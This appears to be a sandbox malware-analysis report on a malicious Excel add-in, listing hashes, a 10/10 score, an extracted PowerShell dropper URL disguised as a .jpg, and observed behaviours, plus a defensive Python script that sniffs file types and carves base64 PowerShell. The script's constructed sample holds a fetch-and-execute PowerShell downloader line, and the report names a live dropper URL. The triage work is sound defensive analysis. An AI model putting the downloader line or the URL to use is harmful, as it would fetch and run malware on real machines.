General

  • Target

    SOA-August.302923.xlam

  • Size

    632KB

  • Sample

    230921-q8q9fsad53

  • MD5

    11a555aac8b3f7cf6909514059bde8cd

  • SHA1

    fe0d334cc8d8feddb5391495fc4054ed2a29e946

  • SHA256

    85f471e81a30470e108b7cdd81400b3716232d89e855e2484376dae63f91b752

  • SHA512

    3247c58546a64cfe800a88796a56ad4e1ba68889e30231ae7984592b928264ae644ea8a09e8ded5863a14d2ad95e869522f2d050bfefffde93f3dff0448f5780

  • SSDEEP

    12288:KE82x7cuq7Zq8a//+1ZpeQV9D4e9TJWyVnBijuQ2P/IT2Us7PKTgi:DIuaMr//+LpVTJWwngjuXAjUKP

Score
10/10

Malware Config

  • Extracted

    Language: ps1
    Deobfuscated URLs:

    ps1.dropper
      https://uploaddeimagens.com.br/images/004/614/895/original/rump_vbs.jpg?1695246171

    exe.dropper
      https://uploaddeimagens.com.br/images/004/614/895/original/rump_vbs.jpg?1695246171

    Both dropper stages reference the same URL. The .jpg extension is only the name the hosting site gives the upload and does not by itself indicate image content; check the leading bytes of whatever is fetched before treating it as an image. The query string 1695246171 is a Unix timestamp (2023-09-20 21:42:51 UTC), consistent with the 230921 prefix of the sample ID.
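A check an analyst would run on a download like the one above, added here as an example and not part of the sandbox report: compare the type the URL claims (from its extension) with the type the bytes actually have (from their magic), and, when they disagree, carve any long base64 run and test whether it decodes to PowerShell. The URL is the one from the extracted config; the two payloads (a minimal JFIF header and a text file wrapping a base64 PowerShell downloader that points at example.invalid) are constructed for the example, nothing was fetched from the real URL.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Dropper URL taken from the extracted config above; both stages reference it.
DROPPER_URL = ("https://uploaddeimagens.com.br/images/004/614/895/original/"
               "rump_vbs.jpg?1695246171")

# Leading magic bytes for the content types worth distinguishing here.
MAGIC = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pe": (b"MZ",),
    "zip": (b"PK\x03\x04",),
}
EXT_TO_TYPE = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif",
               ".exe": "pe", ".dll": "pe", ".zip": "zip"}

# Runs of base64 alphabet long enough to hold a script (64+ chars, optional padding).
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

# Substrings that hint at PowerShell once a blob has been decoded (heuristic only).
PS_HINTS = (b"powershell", b"invoke-expression", b"iex", b"downloadstring",
            b"downloadfile", b"frombase64string", b"new-object", b"-enc")


def sniff_type(data: bytes) -> str:
    """Classify content by its leading bytes, ignoring whatever the URL claims."""
    for name, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return name
    return "unknown"


def claimed_type(url: str) -> str:
    """Content type implied by the URL path's extension (query string ignored)."""
    path = urlparse(url).path.lower()
    for ext, kind in EXT_TO_TYPE.items():
        if path.endswith(ext):
            return kind
    return "unknown"


def extract_base64_blobs(data: bytes) -> list:
    """Strictly decode every long base64 run; runs that fail validation are skipped."""
    blobs = []
    for m in B64_RUN.finditer(data):
        try:
            blobs.append(base64.b64decode(m.group(0), validate=True))
        except (binascii.Error, ValueError):
            continue
    return blobs


def looks_like_powershell(blob: bytes) -> bool:
    """Look for PowerShell tokens in the decoded blob, also after stripping the
    NUL bytes of UTF-16LE (the layout -EncodedCommand payloads use)."""
    views = [blob.lower()]
    if b"\x00" in blob:
        views.append(blob.replace(b"\x00", b"").lower())
    return any(h in v for v in views for h in PS_HINTS)


def triage_download(url: str, data: bytes) -> dict:
    """Report claimed vs. actual type and any embedded PowerShell found."""
    claimed, actual = claimed_type(url), sniff_type(data)
    scripts = [b for b in extract_base64_blobs(data) if looks_like_powershell(b)]
    return {"url": url, "claimed": claimed, "actual": actual,
            "mismatch": claimed != actual, "scripts": scripts}


# Constructed sample inputs (not fetched from the URL above): a minimal JFIF
# header, and a text file carrying a base64-wrapped PowerShell downloader.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 32
SAMPLE_SCRIPT = (b"$u='https://example.invalid/stage2.bin';"
                 b"IEX (New-Object Net.WebClient).DownloadString($u)")
FAKE_JPEG = b"<!-- image -->\r\n" + base64.b64encode(SAMPLE_SCRIPT) + b"\r\n"

if __name__ == "__main__":
    for label, body in (("real jpeg", REAL_JPEG), ("fake jpeg", FAKE_JPEG)):
        r = triage_download(DROPPER_URL, body)
        print(label, "claimed:", r["claimed"], "actual:", r["actual"],
              "mismatch:", r["mismatch"], "scripts:", len(r["scripts"]))
        for s in r["scripts"]:
            print("   ", s.decode("utf-8", "replace"))
```

The magic-byte check is the part that matters operationally: a real image hosted under that path would start with FF D8 FF, while a script disguised as a .jpg will not, and the base64 carve then shows what the ps1 dropper would have executed. The token list is a heuristic; treat a hit as a reason to look, not as proof.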

Targets

    • Target

SOA-August.302923.xlam (size and hashes as listed under General above)

    Score
    10/10
    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks